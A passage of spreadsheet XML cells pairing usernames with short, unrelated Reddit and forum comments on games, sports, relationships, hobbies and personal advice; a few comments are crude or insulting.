    <t>Meh, I don’t believe that anymore. I have two people playing DPSs and we tried multiple times to queue when ‘Tank in need’ was in effect. I rotate between healer and a tank and while we usually wait for 5/10 minutes if I pick tank, it!/ usually just couple of seconds if I pick healer.</t>
  </si>
  <si>
    <t>Midgetversionofyou</t>
  </si>
  <si>
    <t>Bruh my shaft is supporting 3rd world countries for this fight</t>
  </si>
  <si>
    <t>LPHuston</t>
  </si>
  <si>
    <t>Could just be sweat. Looks like it could be something a biker would use for maybe a wallet or something. Can you get a photo of the inside?</t>
  </si>
  <si>
    <t>WreckItBaymax</t>
  </si>
  <si>
    <t>Is it too late to send a text and ask your friend if he still has that extra ticket? Tell him your teeth are feeling better. Or if he gave the ticket to someone else, are you able to pay your own way? If you really want to go, give it a shot, it might not be too late.</t>
  </si>
  <si>
    <t>NoEadshotMachine</t>
  </si>
  <si>
    <t>Want to downvotebut it's at 69</t>
  </si>
  <si>
    <t>SmuJamesB</t>
  </si>
  <si>
    <t>Link is on the pd discord server</t>
  </si>
  <si>
    <t>realdmon</t>
  </si>
  <si>
    <t>Hi, I want to install a treble bleed mod to a set of active EMG KH20 (81,S,S) but I am not sure about the Capacitor and resistor values to use. Has anybody done this before with actives? will a .001uF and 150k work? I don't want to do a lot of trial-and-error testing.</t>
  </si>
  <si>
    <t>johnhk4</t>
  </si>
  <si>
    <t>Presumably at the end of ROTJ, the evil Imperial Empire was destroyed, the Emperor vanquished, Darth Vader redeemed and then died, rebels victorious etc. I've watched the original trilogy countless times since I was 5. I never picked up on any hint that the Imperials survived the battle of Endor. I think that story-wise it is implied that that was the end of the Imperials... so when we get TFA, how can there still be stormtroopers (with new armor), tie fighters, etc? Also, it is heavily implied in the OT that without the sith/dark side of the force, there is no Imperials, they are intrinsic to one another. If the last of the dark side (Palpatine and Vader) were vanquished, shouldn't this prevent any Imperial activity?</t>
  </si>
  <si>
    <t>RoastedToast007</t>
  </si>
  <si>
    <t>I’m gonna guess he/she is transgender</t>
  </si>
  <si>
    <t>joeyharringtonGOAT</t>
  </si>
  <si>
    <t>So you admit you don’t know enough about the topic but were/are willing to dismiss the analogy all together</t>
  </si>
  <si>
    <t>sierra-tinuviel</t>
  </si>
  <si>
    <t>I did something similar too! I started trying to be a better conversationalist by asking lots of questions, which requires you to be an active listener. I started focusing so much more on what other people were saying, not only did it detract from putting pressure on myself, but it also helped me adapt normal social behaviors.</t>
  </si>
  <si>
    <t>Neu_Ron</t>
  </si>
  <si>
    <t>Have you been asked the STAR questions yet of you haven't then prepare for that. If you have then this is only a formality.</t>
  </si>
  <si>
    <t>oldirtygaz</t>
  </si>
  <si>
    <t>I learned of this site during postgraduate study - it would obviously need a lot more explanation of the videos/animations etc. for younger learners: Studies have shown visual reinforcement of English articulation to be significantly more effective than traditional audiolingual methods for adult students to achieve near native-like pronunciation. This website (free) and the accompanying apps ($5) provide animations, step-by-step processes, and video capture isolating word initial/medial/final pronunciation. It’s easy to present in class, and for students to use in their own time. http://soundsofspeech.uiowa.edu/index.html#english</t>
  </si>
  <si>
    <t>DonkeyThruster</t>
  </si>
  <si>
    <t>it's not literally 3 nm in the way that 130 nm is 130 nm. it's marketing.</t>
  </si>
  <si>
    <t>coolvideo1408</t>
  </si>
  <si>
    <t>rarely should the OP comment on his own posts, this is one of those cases</t>
  </si>
  <si>
    <t>DriftsArm</t>
  </si>
  <si>
    <t>great work but all the xbox 9 year olds will just take it legit every 9 year old xbox players pfp is some rare skin holding a controller</t>
  </si>
  <si>
    <t>Your submission has been automatically removed pending manual approval because your account does not meet the minimum karma or account age requirements of /r/worldnews for submitting from an uncommon domain. If you are new to reddit, we suggest you read * [reddit 101](http://www.reddit.com/r/help/comments/2bx3cj/reddit_101/) * [How reddit works](http://www.redditblog.com/2014/07/how-reddit-works.html) * [The rules of /r/worldnews](http://www.reddit.com/r/worldnews/wiki/rules) You may also want to review the [Reddit guidelines regarding spam](http://www.reddit.com/help/faq#Whatconstitutesspam) and the [wiki on self-promotion on reddit](http://www.reddit.com/wiki/selfpromotion). *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/worldnews) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>Taxus_Calyx</t>
  </si>
  <si>
    <t>What Reddit users have the highest upvotes per comment on average?</t>
  </si>
  <si>
    <t>SavingsLow</t>
  </si>
  <si>
    <t>Ignore him, and you've still got Laudrup, Xavi, Iniesta, Busquets, Fabregas and arguably even Thiago.</t>
  </si>
  <si>
    <t>gusto_ua</t>
  </si>
  <si>
    <t>I hate finding my tail light with dead batteries the last minute when I’m ready to go, so… a random bit of red plastic and some kapton tape came to rescue. I actually like it better than any tail light I had - it sits high up on the helmet so it even more visible and it's \[bright as hell\]([https://imgur.com/a/FqUTdCF](https://imgur.com/a/FqUTdCF)), so I don’t even use top modes</t>
  </si>
  <si>
    <t>sum1spcl</t>
  </si>
  <si>
    <t>**If you wash your hands in restaurants before eating** ... Which in India we all do, it's better to do that after ordering and not before that. That's the OP. if you don't wash your hands at all .. good for you.</t>
  </si>
  <si>
    <t>nakamuru</t>
  </si>
  <si>
    <t>First off glad someone doing this. You have own garage with all those tools and lift? Either way how bout more pictures outside Also being a noob to lowering what is wheel space and is it important and safe to modify this? How much were the eibach and installation? I won't go dealer but wondering maybe I should since third party can potentially touch some parts to set things off. Will this void warranty? I'm all for lowering but recently the stock height easily goes over like curbs etc and doesn't scratch which is a relief. Just other day I went over a curb and thought scratches the bottom bumper but it was clearly out of the way. But lower looks much better (how much lower did you go?</t>
  </si>
  <si>
    <t>Martian_Pudding</t>
  </si>
  <si>
    <t>Would like to add that you shouldn't have to respect people's religion either. People deserve respect, not ideas.</t>
  </si>
  <si>
    <t>Candlecakes</t>
  </si>
  <si>
    <t>Yeah... I'm a bartender. If a customer tried to make me mess up and I get everything absolutely correct anyways, I STILL think they are an asshole. My skills have nothing to do with their behavior.</t>
  </si>
  <si>
    <t>Redmonkey3000</t>
  </si>
  <si>
    <t>We are the knights who say Neefi</t>
  </si>
  <si>
    <t>Hamilton950B</t>
  </si>
  <si>
    <t>I'm not familiar with Dawn's product line, but you can't use ordinary soap to wash away salt. You need a potassium soap (sailor's soap) or better yet a detergent. Or, if you just want to wash away the salt and don't care about oil and grease, use vinegar.</t>
  </si>
  <si>
    <t>VlCELAND</t>
  </si>
  <si>
    <t>I think Boston is the better pick obviously. He went from system to system over the past three years and played legit safety. The only thing that concerns me is, why is he only lasting one year in each locker room despite being solid? He can obviously play football, he's obviously a fast learner... so what is it? If it's a locker room issue, we KNOW he's not getting a contract with us. We have way too many rookie DBs, culture is far more important than wins this year.</t>
  </si>
  <si>
    <t>michaelirishred</t>
  </si>
  <si>
    <t>It's just a bad sign in general. Arsenal are looking like a club that would rather ignore reality than just accept what a modern club needs to do to get to the top.</t>
  </si>
  <si>
    <t>RaynGamma</t>
  </si>
  <si>
    <t>I want the shrek bobble head personally</t>
  </si>
  <si>
    <t>AGuestOnAQuest</t>
  </si>
  <si>
    <t>Yea. I had that thought too.</t>
  </si>
  <si>
    <t>_ssh</t>
  </si>
  <si>
    <t>I built a catapult in highschool with like 25 garage door springs. was insanely powerful but someone built a trebuchet and literally butchered our team. we still threw a ball a few hundred feet though. true story, before the trebuchet meme too</t>
  </si>
  <si>
    <t>ReclaimWrangler</t>
  </si>
  <si>
    <t>You drowned the roots, that's the problem. You should be watering way less frequent.</t>
  </si>
  <si>
    <t>awesomeideed_</t>
  </si>
  <si>
    <t>I'll try and get one together in the next week or so and send it to you around next Friday maybe. Thanks for the help in advance. I just thought it might be easier to learn something new than correct old habits. Everything feels wrong on my body with the correct 2hbh technique, but I guess I can work on it if it would be easier to transition into a semi-decent hit, than learn a new one from scratch. Maybe my wrong technique also explains why my offhand shoulder was always sore after playing.</t>
  </si>
  <si>
    <t>gallopingwalloper</t>
  </si>
  <si>
    <t>Thank you so much I was badly burned by an evil therapist who basically threw my court case when I was 17 (she lied, still can’t wrap my head around that one) so have a hard time trusting them. I am working with a lady I like, but every time I open up she’s like, “wait, was this a dream?” Umm, I wish. So I think I need to find a trauma-specific therapist, but it’s been really hard to find the right person through my insurance. The last guy told me I need 5 days a week therapy and should be the control case at this psychotherapy school, sounded like impossible torture, I just wept. Trying to find the right balance between delving into my wounds and gentle self-care, stuff like art and tai chi. Thanks for the support.</t>
  </si>
  <si>
    <t>Nitro_prime</t>
  </si>
  <si>
    <t>Any tips you can give to a boyo that started during steam summer and is only up to the Avian temple?</t>
  </si>
  <si>
    <t>AlenkaFromWonderland</t>
  </si>
  <si>
    <t>Why do they have green dots at the bottom?</t>
  </si>
  <si>
    <t>alelabarca</t>
  </si>
  <si>
    <t>&gt;not active in his community This gets used so much as a way to say "oh you're not *really* one of us then". It happens to me all the time as a Latin Jew, people don't expect the young Hispanic guy to also be pretty Jewish in his belief, and when it comes up some Jews go "oh you don't go to a synagogue? So you're *just* ethnically Jewish then". Like fuck you what I believe is what I believe and being a prick about it makes me want to go to Temple even less.</t>
  </si>
  <si>
    <t>clintyphillips13</t>
  </si>
  <si>
    <t>she’s 10 and can only use one hand</t>
  </si>
  <si>
    <t>coffeecoffeenownow</t>
  </si>
  <si>
    <t>If I hear one more NBC staff/talent say "we didn't think he was serious"..</t>
  </si>
  <si>
    <t>Schmarmbly</t>
  </si>
  <si>
    <t>How do those metrics differ?</t>
  </si>
  <si>
    <t>rarehunty</t>
  </si>
  <si>
    <t>You should check out some of the other communities...people feel it, and the same people to ignore it will be the same ones to point the finger ‍♂️ Still have yet to be told what was incorrect...</t>
  </si>
  <si>
    <t>aureliuss7</t>
  </si>
  <si>
    <t>Million dollar bounties, crate drop battles, no oppressors or military tech.</t>
  </si>
  <si>
    <t>lostsoul369</t>
  </si>
  <si>
    <t>@Floored We have been to a marriage counselor who specializes in infidelity. He has done some joint sessions, some with her by herself and most with me by myself. Basically our marriage broke down, we were both not happy and not talking, not sleeping in the same bed. More like housemates who were raising children. She started a new job, and there was a lot more social activity. She was then drinking more and when away on a work trip, got drunk and somehow had a co-worker that works in another state in her hotel room for a drink, she kissed him, they had sex and then she woke up the next day feeling guilty. But then she was continuing to talk to him via phone and sms for the next week, about their lives etc. Then I found an email she was thinking of sending him saying that she was thinking about an upcoming trip to where he lives for work, and how she wishes that they could see eachother a few times if possible and how he would be able to do that and stay the night as he is married and how she keeps getting flashbacks to them having sex and it makes her smile. She deleted the draft and never sent it, but I found it. What I've learnt in the last 5 months is that she is really selfish, doesn't deal with it and hasn't told one person about what she did. She is scared for her reputation and career, probably more than our marriage. She denied everything until I showed her I'd seen the email and finally admitted it, saying she didn't go looking for it, but it just happened and that she didn't really remember much of it. We worked out that she had emotionally checked out of our marriage and that is why she was able to sleep with him and not even think about me or that we were married. She has some mental issues, and reading up on people with low emotional intelligence and empathy, she has narcissistic behaviors. If something is important to her, she will make time and get it done etc, but if she doesn't want it\/feel like it, she won't. Very selfish. show more ⇓</t>
  </si>
  <si>
    <t>lacompacida</t>
  </si>
  <si>
    <t>More like an anti-soscialist. Who are US allies now other than Russia, Saudi, NK ?</t>
  </si>
  <si>
    <t>Ag In Ok</t>
  </si>
  <si>
    <t>Is this like CPL having dvds?</t>
  </si>
  <si>
    <t>Malua</t>
  </si>
  <si>
    <t>Hi there mutu matu If you want to appeal, use the appeal button on the Account Bans support page. If you are certain your account is secure, you should review what aids you have been using to play the game. Are you using a third party client? Have you re-programmed your mouse? The only contact point for an issue like this is the appeal form. Any other contact methods will not get the issue looked at sooner. Forum Community Helper - Information about the Community Helper Team</t>
  </si>
  <si>
    <t>g-unit1111</t>
  </si>
  <si>
    <t>FSXwithAMD said: There were no 2950Xs when I searched sadly. I think this one will do quite well for the money. Click to expand... You can use the manual entry on PC Part Picker, just select "custom part" and copy and paste the link over. Then when you copy the part list over, edit accordingly.</t>
  </si>
  <si>
    <t>youssefheshamx</t>
  </si>
  <si>
    <t>This has to be the ugliest girl I’ve ever fucking seen in my entire life what the fuck</t>
  </si>
  <si>
    <t>andthensheappeared</t>
  </si>
  <si>
    <t>This sounds incredibly challenging. Supporting another person is really admirable and helpful. It may be helpful to remember that if you’re taking care of yourself you can better take care of others. Have you ever thought of seeking help yourself? There’s a text based help line if you text HELLO to 686868. They may have more solid / scientifically-backed advice too. In the mean time are you able to spend time together at all? Maybe you and your dads girlfriend can plan to do some things he enjoys together, and maybe see if he opens up. It may be good to see if you can talk to him about seeking professional help as well or some sort of support/ friend group/ network. All the very best.</t>
  </si>
  <si>
    <t>alto_queen</t>
  </si>
  <si>
    <t>Potiphar had made a hug pile Owned a large percentage of the Nile Meant that he could really Live in style and he did</t>
  </si>
  <si>
    <t>aimeig</t>
  </si>
  <si>
    <t>Sure! Just because I identify as bi instead of pan doesn't mean trans and nb are excluded. I feel like bi is the easiest way to express my orientation though.</t>
  </si>
  <si>
    <t>bananatron</t>
  </si>
  <si>
    <t>Our world wasn't always filled with excessive sugars, excessive distractions, excessive stimulation. We were designed to crave these things because they were **rare** and now we live in a place where they're infinite. I find it's this weird struggle where you can correlate long-term success/contentment with opting out (or slowing consumption of) of almost everything we're told to consume. At the same time, it's really hard. My mind wants to remain distracted and my body [wants the sugar](https://www.neobub.com/maybe/post/tainted_honey).</t>
  </si>
  <si>
    <t>hazandduck</t>
  </si>
  <si>
    <t>Actually laughing my head off reading these comments that sum up my life right now with a 20 month old! Wouldn’t have it any other way..! It’s very hard adjusting OP. My DD was a dream as a baby really too but I only appreciated it after she turned one and started walking (running) and turned in to the most defiant, stubborn, mad-as-a-box-of-frogs kid ever!</t>
  </si>
  <si>
    <t>frenulum2002</t>
  </si>
  <si>
    <t>Thanks for the response. What I don’t understand about female circumcision is, how come they can’t agree on what to cut? Some cut out the external portion of the clitoris while others only cut part of the hood and part of the labia while others just do a pin prick. Why can they come up with a general procedure that is consistent for woman? A clitoral hoodectomy combined with a labiaplasty is identical to modern day male circumcision. Cutting off the clitoris is equivalent to cutting off the head of the penis, which is not equal. Just curious to hear your thoughts on this?</t>
  </si>
  <si>
    <t>AlfredoDangles</t>
  </si>
  <si>
    <t>On the flip side, I only think one of the coaches you listed is decent</t>
  </si>
  <si>
    <t>geekfest</t>
  </si>
  <si>
    <t>When the commander of Special Operations Joint Task Force Operation Inherent Resolve unceremoniously booted SEAL Team 7 out of Iraq this week, the U.S. Special Operations Command justified it "due to a perceived deterioration of good order and discipline within the team during non-operational periods."But according to an alarming new report in the New York Times, "deterioration of good order and discipline" seemed to be an understatement.While the Navy initially indicated that an alcohol-soaked July 4th party was the core driver of the decision, a senior Navy official revealed to the New York Times' David Philipps that a senior enlisted platoon member had allegedly raped a female service member assigned to the SEAL platoon.In addition, "when commanders began investigating the allegations, the entire platoon invoked their right to remain silent" under the Fifth Amendment, Philipps reports. "At that point, the official said, commanders decided to send the whole platoon home, including the lieutenant in command."When reached for comment by Task &amp; Purpose, SOCOM spokesman Ken McGraw said the command was "unable to confirm the nature of any allegations that are currently under investigation." https://news.yahoo.com/navy-reported...040000812.html</t>
  </si>
  <si>
    <t>Sunnydays215</t>
  </si>
  <si>
    <t>to you as well!!</t>
  </si>
  <si>
    <t>sadpolylover</t>
  </si>
  <si>
    <t>See it as a temporary setback and stay positive.</t>
  </si>
  <si>
    <t>grewapair</t>
  </si>
  <si>
    <t>Good find.</t>
  </si>
  <si>
    <t>JoshJMC</t>
  </si>
  <si>
    <t>Most likely if he doesn't want Aguero and Jesus rushed back before full fitness</t>
  </si>
  <si>
    <t>Kakumite</t>
  </si>
  <si>
    <t>A celebrity isn't going to make people care that don't.</t>
  </si>
  <si>
    <t>memeeboi3</t>
  </si>
  <si>
    <t>Yup! I just bought, just to be able to look at the pictures. It's very mesmerizing ! I love it</t>
  </si>
  <si>
    <t>ruphun</t>
  </si>
  <si>
    <t>Thx bro! I know right? We need updates!!!</t>
  </si>
  <si>
    <t>MorgWarMarshal</t>
  </si>
  <si>
    <t>I’ll suggest At Your End Step, but I’m a bit biased as I am one of the hosts</t>
  </si>
  <si>
    <t>DealsFreak</t>
  </si>
  <si>
    <t>Just came across this deal. Not sure if its been posted already: 4 weeks free pass $50 off when you sign up later I just submitted the form and waiting to hear back. Anyone got this deal already ?</t>
  </si>
  <si>
    <t>SparklyUnicornLady</t>
  </si>
  <si>
    <t>I never said he couldn’t move out of state or be tied down to the same city. Why are you telling me this?</t>
  </si>
  <si>
    <t>risingroots</t>
  </si>
  <si>
    <t>Saliba really tried and gave his all as a 17 year old.</t>
  </si>
  <si>
    <t>VeNeM</t>
  </si>
  <si>
    <t>He won't say it but wow, just wow. Dumb</t>
  </si>
  <si>
    <t>spiderharry02</t>
  </si>
  <si>
    <t>I'm getting a lot of spam messages which i can't block or set to spam (says invalid number), idk if its from vodafone or what but its driving me crazy help pls</t>
  </si>
  <si>
    <t>TheCobbler</t>
  </si>
  <si>
    <t>Exclusive: TSA officers placed on leave after discovery of racist display https://www.cnn.com/2019/07/30/politics/transportation-security-administration-racist-display/index.html Trump supporters and their narrow minded, racist hate crimes.</t>
  </si>
  <si>
    <t>shutthefuckup12345</t>
  </si>
  <si>
    <t>ESH. You obviously went overboard and need to control your temper and deal with minor inconveniences in a healthier way. However, belligerent bicyclists are immensely annoying and need to realise that they should be in the side if the road so long as there is a path they can bike so cars can pass them. Nothing's more annoying than getting stuck behind a bicycle trying to assert dominance on your morning commute.</t>
  </si>
  <si>
    <t>MarkBoabaca</t>
  </si>
  <si>
    <t>&gt; my beta self won't let me. The only times I'm alpha is when i'm drunk You answered your own problem right here. You're overthinking, and they only time you're more alpha, as you say, is when your inhibitions are lowered and you're not hyper focusing on what you should or shouldn't do. Try meditating, exercising, or taking up some activity that redistributes your focus away from how you think you should act. It should come naturally. Don't call yourself a beta. It's just a label, but when you associate yourself with that label you're adding to your own negative mindset.</t>
  </si>
  <si>
    <t>Mingura666</t>
  </si>
  <si>
    <t>Last year schemes started like something very serious as there were exclusive scheme cards, for example the Aces Watson was exclusively West Coast. The fact that later in the season they made “scheme select”, imo, proves that schemes failed. There’s no point of having 4 cards that are exactly the same except of the scheme. It would be easier for everyone if we just have one version of the player and get rid off of schemes. And I really think that later they will add “scheme select” again becase users will complain about certain positions available for all schemes but theirs (just like the vertical o-linemen that were almost none for a long time last season). So yeah, I agree with you OP.</t>
  </si>
  <si>
    <t>jayjackson</t>
  </si>
  <si>
    <t>In reply to Pekkie: Whilst I kind of see yours and John’s point about using a GriGri to help manage the risk... “A Grigri with a plastic cover over the screw gate krab is a fail safe solution providing the belayer lets go as soon as an attack begins.” ...this statement is absolutely not the case. At no point should we be relying on a break assisted device to be doing the work of a locking or fall a rest device - even if you do use it personally in this manner, it sends the wrong message and is a demonstration of poor practice. As John and you mention, even if it does work, it leaves the climber in a awful situation if the climbers are alone. As the next poster mentioned, there are fits and there are fits - some grand mal seizures can be incredibly violent, the risk of injury to the belayer and the chance of inadvertently unlocking the loaded grigri without control of the dead rope would be far to high. —- DVLA comment is good - if someone can drive they should be able to belay! More helpful though would probably be to ask the person themselves - how much notice do they get before a seizure? Even if only 30secs, then with an aware climber a lower to the floor should be manageable (maybe not on trad routes!). If less than this, having an aware third person around to take control of the lower if required would probably be the best solution. if no notice, and the seizures are not in any way predictable, then the reality is probably that a third person who can competently tail the belay at all time is probably the safest solution.</t>
  </si>
  <si>
    <t>sithlordmaster181</t>
  </si>
  <si>
    <t>So you ride your scooter on the sidewalk? That’s illegal literally everywhere.</t>
  </si>
  <si>
    <t>BikeBence</t>
  </si>
  <si>
    <t>It has aged in a weird way.</t>
  </si>
  <si>
    <t>been_there_for_bo1</t>
  </si>
  <si>
    <t>Patrick has toes and I dont like it one bit</t>
  </si>
  <si>
    <t>GenghisKhanSpermShot</t>
  </si>
  <si>
    <t>It's only awkward if you make it awkward, anxiety might only make your trip annoying and not as fun. So either tell him before to clear it up if you're really worried or just enjoy the ride and just tell him how you feel and dont put such big expectations out of it, keep it light while you're tripping and feel it out.</t>
  </si>
  <si>
    <t>Matrix1216</t>
  </si>
  <si>
    <t>Thanks GE for selling off</t>
  </si>
  <si>
    <t>FloralBison</t>
  </si>
  <si>
    <t>Yup, came here to say this. The trailer made it seem great, the cast was spot-on (I love Matt Damon) but about halfway though the movie it just started getting weird I guess? It was like they put all of their creative energy into the idea of shrinking people to save the world, coming up with all kinds of ways to make it make sense in a movie, but then in the last minute were like "oh yeah now we need to make a story" and just kind of threw something together.</t>
  </si>
  <si>
    <t>Alex</t>
  </si>
  <si>
    <t>Hi, For sale this high quality make Tenba DNA laptop/camera bag. Look it up, and if you’ve ever seen them you’ll know the quality. Little big for me to continue road tripping with, so on it goes.. Will reply asap for emails..</t>
  </si>
  <si>
    <t>ppw23</t>
  </si>
  <si>
    <t>I was about to say, I didn't know that shooting people was considered an attractive trait in a partner. Gee, she's able to overlook his hideous appearance due to him shooting 2 people, must be a true aphrodisiac.</t>
  </si>
  <si>
    <t>AnonImmety</t>
  </si>
  <si>
    <t>That might change after you start having sex.</t>
  </si>
  <si>
    <t>13carl13</t>
  </si>
  <si>
    <t>Quote: from: vinirocket on July 28, 2019, 02:26:45 PM Quote: from: tomcio2001 on July 27, 2019, 09:07:19 AM Everything goes according to plan. The team was able to attract many developers to the platform. I think that their interaction with the project will be very promising. I am also impressed that the team is as public as possible and takes part in many international conferences. I think that the project has a great future. why is there so little information about the government of India's support for the project? what exactly is this support I would like to understand for me.</t>
  </si>
  <si>
    <t>summerdoll373</t>
  </si>
  <si>
    <t>You’re right. There have been many days where I would eat a whole tub of ice cream for lunch then go to movies for dinner and devour popcorn, hot dogs, and candies.</t>
  </si>
  <si>
    <t>Cleopatra</t>
  </si>
  <si>
    <t>Sounds like something community will hate with passion, honestly.</t>
  </si>
  <si>
    <t>iamjestonilee</t>
  </si>
  <si>
    <t>iamjestonilee , Jun 22, 2017 : Mykson said: ↑ Yes, but they're mostly stable. Click to expand... thanks mhen, you're the best!</t>
  </si>
  <si>
    <t>fratstache</t>
  </si>
  <si>
    <t>Jesus kid drink your mountain dew and calm down.</t>
  </si>
  <si>
    <t>Lady_PANdemonium_</t>
  </si>
  <si>
    <t>Bernie seems like the kind of guy that will pay off my student loans even if I didn’t get a pell grant, open a business, give a mouse a cookie, follow the second star to the right and straight on till morning, and win the lottery on the 31st of February.</t>
  </si>
  <si>
    <t>na1na2</t>
  </si>
  <si>
    <t>Only 4 kids playing fortnite while the others watch</t>
  </si>
  <si>
    <t>patrickshenlin</t>
  </si>
  <si>
    <t>I agree with most of what you are saying but I want to see your response to this: say someone who has been liberally drinking coke every day for a few years has the drink suddenly removed from their life. Don’t you think they will have withdrawals just as anyone else who loses something they consume daily? Of course the symptoms would not be of the same degree as if say the person had been continuously smoking weed or drinking alcohol, but there would be symptoms nonetheless. In my opinion, everything from eating sugary foods to snorting cocaine can result in an addiction. I have no scientific evidence to back this up it’s just my outlook on the subject.</t>
  </si>
  <si>
    <t>Twill6990</t>
  </si>
  <si>
    <t>So I’m home and in decent pain but just relaxing. Idk how to feel. My doctor said she didn’t see any endo, but I was full of spider web looking scar tissue that had a bunch of my organs stuck together. Has this happened to anyone ? When I did a google search “adhesion related disorder” was the first to pop up. States it can mimic endo. But why are my hormones crazy ? Why do my boobs hurt, terrible periods, and all that. I’m curious is anyone was told this and maybe the scaring hid the endo. Both diagnosis are bad, I just want to take care of myself properly. TIA</t>
  </si>
  <si>
    <t>Reddit_PoliceChief</t>
  </si>
  <si>
    <t>*Who's on top of the food chain now you fucking heathens?*</t>
  </si>
  <si>
    <t>PigsCanFly2day</t>
  </si>
  <si>
    <t>Doesn't sound too bad. How do you get the meshes? Did a quick search and it seems like most have to be purchased, is that correct? What resources would you suggest for people looking to get into this?</t>
  </si>
  <si>
    <t>JensJ300</t>
  </si>
  <si>
    <t>We only use our Nintendo Switch for local 4+ player games. We currently have the following games: Street Fighter Rocket Fist Mario Kart 8 Lovers in a Dangerous Spacetime Super Mario Party 1-2-Switch Super Bomberman 10 Second Run Overcooked Worms W.M.D Stikbold Are we missing any good games?</t>
  </si>
  <si>
    <t>BEWMarth</t>
  </si>
  <si>
    <t>go with PW3 man I was asking the same question as you a few month ago got PW3 and dont regret it. Really excels as a 2 player game tho way funner with a friend.</t>
  </si>
  <si>
    <t>hew123</t>
  </si>
  <si>
    <t>Yes, you can exclusively cast polypore strike with the staff for more damage.</t>
  </si>
  <si>
    <t>Arrived promptly and packaged well. Excellent fit to my windows and very nice material.</t>
  </si>
  <si>
    <t>Orwellisright</t>
  </si>
  <si>
    <t>Achso , alles klar. No sir I'm Indian. How is Germany treating you ?</t>
  </si>
  <si>
    <t>LovableLycanthrope</t>
  </si>
  <si>
    <t>Giving Mizzou the death penalty</t>
  </si>
  <si>
    <t>marvelousshenanigan</t>
  </si>
  <si>
    <t>I am not a clinician and cannot formally diagnose you, but this is what we call homicidal ideation in the mental health world and is likely coming from PTSD from your childhood. You would get help by going to a mental health clinic and having a Comprehensive clinical assessment and the clinician would probably recommend talk therapy and possibly a psychiatric evaluation to see if you would benefit from medication. Homicidal ideation is not an uncommon thing and is not seen as a “send them to an insane asylum thing” unless you don’t pass a safety check. (Which includes questions like do you have a reason, means, and a plan to hurt someone or do you just think about it without a plan/ way to hurt them.) Again I am not a clinician, but I do work in the mental health field, feel free to PM me if you want to talk.</t>
  </si>
  <si>
    <t>MonsterMeat111</t>
  </si>
  <si>
    <t>Once he got off the juice, damn!!!! Dude shrunk</t>
  </si>
  <si>
    <t>Comrade_Phil_</t>
  </si>
  <si>
    <t>Nice one. I've said this to a lot - the number doesnt matter, as long as you are enjoying yourself and improving :)</t>
  </si>
  <si>
    <t>bulgariamexicali</t>
  </si>
  <si>
    <t>&gt; What’s the point of getting a European passport at 35 might as well come back to the club that gave him everything and retire here comfortably before it’s too late. I agree with you, but it seems like Ochoa doesn't care that much about the money and really, really wants to play for a big team in Europe. &gt; We need a gk and Ochoa would be the best choice no matter what. That's it, if he wanted to, but I don't see it happening. He ate bench like a champ in Malaga just to stay in Europe. He is not coming back just yet.</t>
  </si>
  <si>
    <t>Fenris_uy</t>
  </si>
  <si>
    <t>It might not look like it, but the next US election is 16 months away.</t>
  </si>
  <si>
    <t>ashtrainer27</t>
  </si>
  <si>
    <t>Well, thanks for understanding, man. While there are a lot of bible thumping lunatics, there's a handful of us that try not to shove religion down your throats. Believe in what you want to believe in, man.</t>
  </si>
  <si>
    <t>glimmeringsea</t>
  </si>
  <si>
    <t>Sorry about your iguana. :(</t>
  </si>
  <si>
    <t>Ross2552</t>
  </si>
  <si>
    <t>Collector's edition - or the "Season of Warfare" edition. Was just curious if that was what you'd preordered.</t>
  </si>
  <si>
    <t>BattleFleetUrvan</t>
  </si>
  <si>
    <t>Depends, what’s the crisis strength?</t>
  </si>
  <si>
    <t>MrDaburks</t>
  </si>
  <si>
    <t>Man, virtually every serial killer and serial rapist followed the exact behavioral pattern your nephew does.</t>
  </si>
  <si>
    <t>Masaksih</t>
  </si>
  <si>
    <t>Love this! I started cycling almost two months ago and I've been looking for a way to enhance my cycling, this I definitely would try! Here's a ghetto gold for you</t>
  </si>
  <si>
    <t>ablum65</t>
  </si>
  <si>
    <t>I have to give it to you, this is exactly what I am looking for. That said, after multiple days researching covers, I never ran across them.</t>
  </si>
  <si>
    <t>bewarethetreebadger</t>
  </si>
  <si>
    <t>Not at all. The lower-gut part over the pelvic bone. Just above... I guess what *you’re* referring to as a front butt?</t>
  </si>
  <si>
    <t>Avika123</t>
  </si>
  <si>
    <t>Toasttimebitches</t>
  </si>
  <si>
    <t>I'm glad on one of the posts someone mentioned how you can still look pregnant postpartum so screw those people</t>
  </si>
  <si>
    <t>matts290</t>
  </si>
  <si>
    <t>Looks the best I can remember since early 2018</t>
  </si>
  <si>
    <t>jwreynold</t>
  </si>
  <si>
    <t>How many years... ago. People got used to that by about July 2017. Tanaka’s a good 2 starter with a great playoff track record.</t>
  </si>
  <si>
    <t>Durinthal</t>
  </si>
  <si>
    <t>This submission has been removed. - Clip submissions must contain the name of the show in the title and be flaired with the [Clip] tag as well as be between 10 seconds and 5 minutes. Clips from currently airing shows cannot be posted within 24 hours after the episode discussion thread is posted. Additionally, we have a limit of 4 clips/videos per week and going over this limit is considered spamming. --- ^(Have a question or think this removal was an error?) **[^(Message the mods.)](http://www.reddit.com/message/compose?to=%2Fr%2Fanime)** ^(Don't know the rules? Read them )**[^(here)](/r/anime/wiki/rules)**^.</t>
  </si>
  <si>
    <t>Guest</t>
  </si>
  <si>
    <t>Re: Mode and Raven Sticks Mon Jul 29, 2019 9:47 am L Quote: : Both used extensively in Canada, no so much in the States. Do they even sell them in the US? 0 x</t>
  </si>
  <si>
    <t>tonyw</t>
  </si>
  <si>
    <t>Grumpy Git said: Just how many players do Bolton have? Will they be able to field a full side of professional footballers or is it a makeshift side? Great for teams who play them now, The EFL are complete fools. They are not fit to manage. At the moment, I believe they have seven officially registered senior players. At least that's what's listed on the official webpage. Although two of them are goalies, and none of them are defenders. At least two of them are pretty good - Ertun Oztumer and Josh Magennis - although both have enlisted the help of the PFA in the past couple of weeks to get out of their Bolton contracts (which seems fair enough if they haven't been getting paid). However, players like David Wheater (who, I imagine, could still do a job in League One) have been training with them and playing in friendlies. So if they close the takeover before Saturday, they'll probably be able to at least sign some short term deals and field a decent team at the weekend. If they can't close the takeover by then, Wycombe should be licking their lips at facing the Bolton youth team defense...….</t>
  </si>
  <si>
    <t>ReadingFromTheToilet</t>
  </si>
  <si>
